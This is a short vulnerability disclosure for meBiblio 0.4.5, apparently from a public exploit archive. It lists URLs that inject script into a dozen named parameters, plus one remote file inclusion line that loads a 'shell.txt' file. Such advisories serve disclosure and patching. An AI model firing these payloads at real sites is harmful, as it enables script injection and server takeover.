meBiblio version 0.4.5 suffers from cross site scripting vulnerabilities.
c30ea4ba6fe05f95dec2537250049645fa32b021ce3d29b0f119716a65c10ab6
~~~~~~~~~~~~~~~~~~~~~~~~
~ meBiblio 0.4.5 XSS ~
~~~~~~~~~~~~~~~~~~~~~~~~
---------------------
Author : ShAy6oOoN
---------------------
Group : PitBull Crew
---------------------
Script : meBiblio 0.4.5
---------------------
Download : http://downloads.sourceforge.net/mebiblio/meBiblio-0.4.5.tar.gz?modtime=1195237984&big_mirror=0
---------------------
Vulnerability Type : Cross Site Scripting
---------------------
Register_globals : On
---------------------
http://localhost/path/add_class_mask.inc.php?InsertJournal=<script>alert(123);</script>
http://localhost/path/add_journal_mask.inc.php?InsertJournal=<script>alert(123);</script>
http://localhost/path/index.php?action=<script>alert(123);</script>
http://localhost/path/index.php?action=http://localhost/shell.txt?
http://localhost/path/insert_mask.inc.php?InsertBibliography=<script>alert(123);</script>
http://localhost/path/insert_mask.inc.php?LabelAuthor=<script>alert(123);</script>
http://localhost/path/insert_mask.inc.php?LabelOthers=<script>alert(123);</script>
http://localhost/path/insert_mask.inc.php?LabelTitle=<script>alert(123);</script>
http://localhost/path/insert_mask.inc.php?LabelJournal=<script>alert(123);</script>
http://localhost/path/newClass.inc.php?InsertJournal=<script>alert(123);</script>
http://localhost/path/newJournal.inc.php?InsertJournal=<script>alert(123);</script>
---------------------
Register_globals : Off
---------------------
http://localhost/path/dbadd.inc.php?which=<script>alert(123);</script>
Greetings:
----------
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r - Inphex
Thanks To:
----------
packetstormsecurity.org